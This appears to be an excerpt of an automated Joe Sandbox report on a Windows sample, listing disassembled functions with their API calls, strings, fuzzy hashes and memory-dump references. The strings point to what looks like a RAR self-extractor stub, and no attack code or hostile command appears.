Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: 2746f0669908a2fcfcb1c45a93daaffe3e0e542cec6b2c28da1fc8101531eda5
Instruction ID: b2a9259a8aec2cbb1591a2a773e74c68696e5ac320ddae662f4ef317a7046def
Opcode Fuzzy Hash: 2746f0669908a2fcfcb1c45a93daaffe3e0e542cec6b2c28da1fc8101531eda5
Instruction Fuzzy Hash: 42714B71A00259AFDF14DFA5CC99DBEB7F9FF48710B140299E512A72A0CBB0AD01CB60

Function 00BB9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BB9387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00BB93AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00BB93C9

Part of subcall function 00BBC29A: _wcslen.LIBCMT ref: 00BBC2A2

Part of subcall function 00BC1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00BBC116,00000000,.exe,?,?,00000800,?,?,?,00BC8E3C), ref: 00BC1FD1

_swprintf.LIBCMT ref: 00BB9465

Part of subcall function 00BB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BB40A5

MoveFileW.KERNEL32(?,?), ref: 00BB94D4
MoveFileW.KERNEL32(?,?), ref: 00BB9514

Strings

rtmp%d, xrefs: 00BB944E

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: 1fc50f07ff4cf8bdaeff1387e670b81e854be2d8bc069b5fa68b5511d838ab85
Instruction ID: 43c2310c3522530730c0bbc0c537429cd1ffdec08fc6ebf48cb3e97cfc851349
Opcode Fuzzy Hash: 1fc50f07ff4cf8bdaeff1387e670b81e854be2d8bc069b5fa68b5511d838ab85
Instruction Fuzzy Hash: AD413071940258A7DF31EB608C45EFE77FCEF55740F0048E5B649A3152DAB88B898B64

Function 00BC1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00BC122E

Part of subcall function 00BBB146: GetVersionExW.KERNEL32(?), ref: 00BBB16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00BC1251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00BC1263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00BC1274
SystemTimeToFileTime.KERNEL32(?,?), ref: 00BC1284
SystemTimeToFileTime.KERNEL32(?,?), ref: 00BC1294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00BC12CF
__aullrem.LIBCMT ref: 00BC1379

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 407db0dfb418bb9a72249f168ba668215d29b5e76f1d43a2358514c0c7667aa4
Instruction ID: f7d61b84628b41f7d657ad2c1fa0f2e53ad402330a443c14e95ff4ef061e1ec8
Opcode Fuzzy Hash: 407db0dfb418bb9a72249f168ba668215d29b5e76f1d43a2358514c0c7667aa4
Instruction Fuzzy Hash: 8B41F5B2508345AFC710DF69C884A6BBBE9FB88714F00892EF596D7211E734E649CB52

Function 00BB2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00BB2536

Part of subcall function 00BB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BB40A5

Part of subcall function 00BC05DA: _wcslen.LIBCMT ref: 00BC05E0

Strings

x%u, xrefs: 00BB26FD
;%u, xrefs: 00BB2523
xc%u, xrefs: 00BB275A

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: 0558c93b57d685af5c1e92e878e2d5e4e49f53f751b4803f5a32db3a45325118
Instruction ID: c80df8f9cf0f720cfc2895237bad0207413547aa4470ac2a1d0b5d656c6a2870
Opcode Fuzzy Hash: 0558c93b57d685af5c1e92e878e2d5e4e49f53f751b4803f5a32db3a45325118
Instruction Fuzzy Hash: 1BF1FB706043405BDF25EB2488D5BFE7BD59FA5300F0805EDED869B243DBE49949C7A2

Function 00BC9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BC9D0A

Strings

>, xrefs: 00BC9D4B
</style>, xrefs: 00BC9E52
</p>, xrefs: 00BC9DE8
<br>, xrefs: 00BC9DFE
<style>, xrefs: 00BC9E30

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: accf50a66f9810465ca473d4612f04123f629f35c73d8e0b57fd1076dd582aa6
Instruction ID: 307b446ea928b1297bcc8a5d940124b5a4f032814042839d5ab95fb29c3ae361
Opcode Fuzzy Hash: accf50a66f9810465ca473d4612f04123f629f35c73d8e0b57fd1076dd582aa6
Instruction Fuzzy Hash: 00515C5670036395FB309A199819F7673E0DFB1750F5804BEF9C2EB1C1FB658D458261

Function 00BDF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00BDFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00BDF6CF
__fassign.LIBCMT ref: 00BDF74A
__fassign.LIBCMT ref: 00BDF765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00BDF78B
WriteFile.KERNEL32(?,00000000,00000000,00BDFE02,00000000,?,?,?,?,?,?,?,?,?,00BDFE02,00000000), ref: 00BDF7AA
WriteFile.KERNEL32(?,00000000,00000001,00BDFE02,00000000,?,?,?,?,?,?,?,?,?,00BDFE02,00000000), ref: 00BDF7E3

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: d3be896dfb59384420e18fca9836b3d949356341e56444c562a35900297dfd88
Instruction ID: 08b6c37ccd5db52e8121ae05d8c0791c9133fc0e4bf3fcf164fc2e761d10b5ba
Opcode Fuzzy Hash: d3be896dfb59384420e18fca9836b3d949356341e56444c562a35900297dfd88
Instruction Fuzzy Hash: 235194B190424A9FCB10CFA4DC85AEEFBF4EF09310F1441AAE556E7351E730AA40CBA1

Function 00BD2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00BD2937
___except_validate_context_record.LIBVCRUNTIME ref: 00BD293F
_ValidateLocalCookies.LIBCMT ref: 00BD29C8
__IsNonwritableInCurrentImage.LIBCMT ref: 00BD29F3
_ValidateLocalCookies.LIBCMT ref: 00BD2A48

Strings

csm, xrefs: 00BD29DD

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 0854b6620820a372a1c0a3e251564b4fea896bb5981f7321b838ee4f2414f4ca
Instruction ID: 6266cffdf9ef675ae31a16071f145f81bdd665c9938edb5910c1ec0056f053f9
Opcode Fuzzy Hash: 0854b6620820a372a1c0a3e251564b4fea896bb5981f7321b838ee4f2414f4ca
Instruction Fuzzy Hash: D641C934A002989FCF10DF68C895A9EFBF5EF54314F1480E6E8195B392E735DA01CB91

Function 00BC9ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00BC9EEE
GetWindowRect.USER32(?,00000000), ref: 00BC9F44
ShowWindow.USER32(?,00000005,00000000), ref: 00BC9FDB
SetWindowTextW.USER32(?,00000000), ref: 00BC9FE3
ShowWindow.USER32(00000000,00000005), ref: 00BC9FF9

Strings

RarHtmlClassName, xrefs: 00BC9FA5

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: c0b57e07bd214c133594ec55c62d4577eb8aae6a5ffed8672b5658ccc992b48a
Instruction ID: 3cbd1df7692bc041a2b08bbe34959b24458cad044871b2be40e24f0da4a89a7d
Opcode Fuzzy Hash: c0b57e07bd214c133594ec55c62d4577eb8aae6a5ffed8672b5658ccc992b48a
Instruction Fuzzy Hash: B541BC31104204AFDB215F649C4CFAFBBE8FB49709F10859DF809AA152DB34EA05CB62

Function 00BC9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BC995E
_wcslen.LIBCMT ref: 00BC9993

Strings

<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00BC9987
<br>, xrefs: 00BC99DF
 , xrefs: 00BC9A21
, xrefs: 00BC99B0

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: 90fed56cd9d7cacce3212816fbb8d33f10a72175c96904389d5438c6de276857
Instruction ID: b6c857a57482aceca7f1a3055547aa30826539c6a2cca3803d165c79bf93faa0
Opcode Fuzzy Hash: 90fed56cd9d7cacce3212816fbb8d33f10a72175c96904389d5438c6de276857
Instruction Fuzzy Hash: 7C313B7264434556FA30AB949C46F7AB3E4EB90720F50449FF486972D1FBA4AD4183A1

Function 00BDC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00BDC868: _free.LIBCMT ref: 00BDC891

_free.LIBCMT ref: 00BDC8F2

Part of subcall function 00BD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDC896,?,00000000,?,00000000,?,00BDC8BD,?,00000007,?,?,00BDCCBA,?), ref: 00BD8DE2
Part of subcall function 00BD8DCC: GetLastError.KERNEL32(?,?,00BDC896,?,00000000,?,00000000,?,00BDC8BD,?,00000007,?,?,00BDCCBA,?,?), ref: 00BD8DF4

_free.LIBCMT ref: 00BDC8FD
_free.LIBCMT ref: 00BDC908
_free.LIBCMT ref: 00BDC95C
_free.LIBCMT ref: 00BDC967
_free.LIBCMT ref: 00BDC972
_free.LIBCMT ref: 00BDC97D

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: 37d79d8cfdd1f51c743893636cca223be7cca60ffafc8b22db40f90d9f591e51
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: DB116D71580B05BAE520B7B1CC07FDBFBED9F44B00F400D6AB29D66292EA66A505D750

Function 00BCE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00BCE669,00BCE5CC,00BCE86D), ref: 00BCE605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00BCE61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00BCE630

Strings

AcquireSRWLockExclusive, xrefs: 00BCE615
KERNEL32.DLL, xrefs: 00BCE600
ReleaseSRWLockExclusive, xrefs: 00BCE625

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 93c8cb2ec57983780c3ba138af30121ec414f20a0173c186d9fb2322b4821c46
Instruction ID: b66385da2cc2ae964027bc8d9c8ac6ba746404cf1bb0759dce4e1e7b137b46cb
Opcode Fuzzy Hash: 93c8cb2ec57983780c3ba138af30121ec414f20a0173c186d9fb2322b4821c46
Instruction Fuzzy Hash: A0F0C2327B26A2DB0F314F655CD9FAA32C8AA3675531444FDEE25D7110EB24CD505AD0

Function 00BC146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00BC14C2

Part of subcall function 00BBB146: GetVersionExW.KERNEL32(?), ref: 00BBB16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00BC14E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 00BC1500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00BC1513
SystemTimeToFileTime.KERNEL32(?,?), ref: 00BC1523
SystemTimeToFileTime.KERNEL32(?,?), ref: 00BC1533

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 37620a617d32bfcf4a5a999c23f5a8d826a3b6607464852941592c7f6427d539
Instruction ID: 1486c19582a375e2ad14cb75a0322496ecf7f741dd697049cc445e4a94d5ee3e
Opcode Fuzzy Hash: 37620a617d32bfcf4a5a999c23f5a8d826a3b6607464852941592c7f6427d539
Instruction Fuzzy Hash: DC31E875118345ABC704DFA8C88599BB7F8FF98714F004A1EF996D3210E730D549CBA6

Function 00BD2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00BD2AF1,00BD02FC,00BCFA34), ref: 00BD2B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BD2B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BD2B2F
SetLastError.KERNEL32(00000000,00BD2AF1,00BD02FC,00BCFA34), ref: 00BD2B81

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: b2e9ba9560288802f0dbeb3ce200f186b8819ba81f79917b0bd98545047b40a5
Instruction ID: ee24a62a59bcea452a42a6137be99c1873e2ad5e73b810fb977af9fde630d725
Opcode Fuzzy Hash: b2e9ba9560288802f0dbeb3ce200f186b8819ba81f79917b0bd98545047b40a5
Instruction Fuzzy Hash: 9E014C321097512EA7142B747CC5916EBC5EF22B71B300BBBF0204B3E1FF918C005500

Function 00BD97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00BF1030,00BD4674,00BF1030,?,?,00BD3F73,00000050,?,00BF1030,00000200), ref: 00BD97E9
_free.LIBCMT ref: 00BD981C
_free.LIBCMT ref: 00BD9844
SetLastError.KERNEL32(00000000,?,00BF1030,00000200), ref: 00BD9851
SetLastError.KERNEL32(00000000,?,00BF1030,00000200), ref: 00BD985D
_abort.LIBCMT ref: 00BD9863

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 0d162c2f4b48fe8b4fd6040859823e8b24036347ec0df940ab7e773edebd0203
Instruction ID: c530fcae7376ba1f25bdf5b158c19f7530e35e464cbd68ab236d3389de19b5a5
Opcode Fuzzy Hash: 0d162c2f4b48fe8b4fd6040859823e8b24036347ec0df940ab7e773edebd0203
Instruction Fuzzy Hash: A3F0F43610060167C75233247C8AB1B9AE6CFD2FB1F3000BAF525AB3D2FE22CC01A521

Function 00BCDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00BCDC47
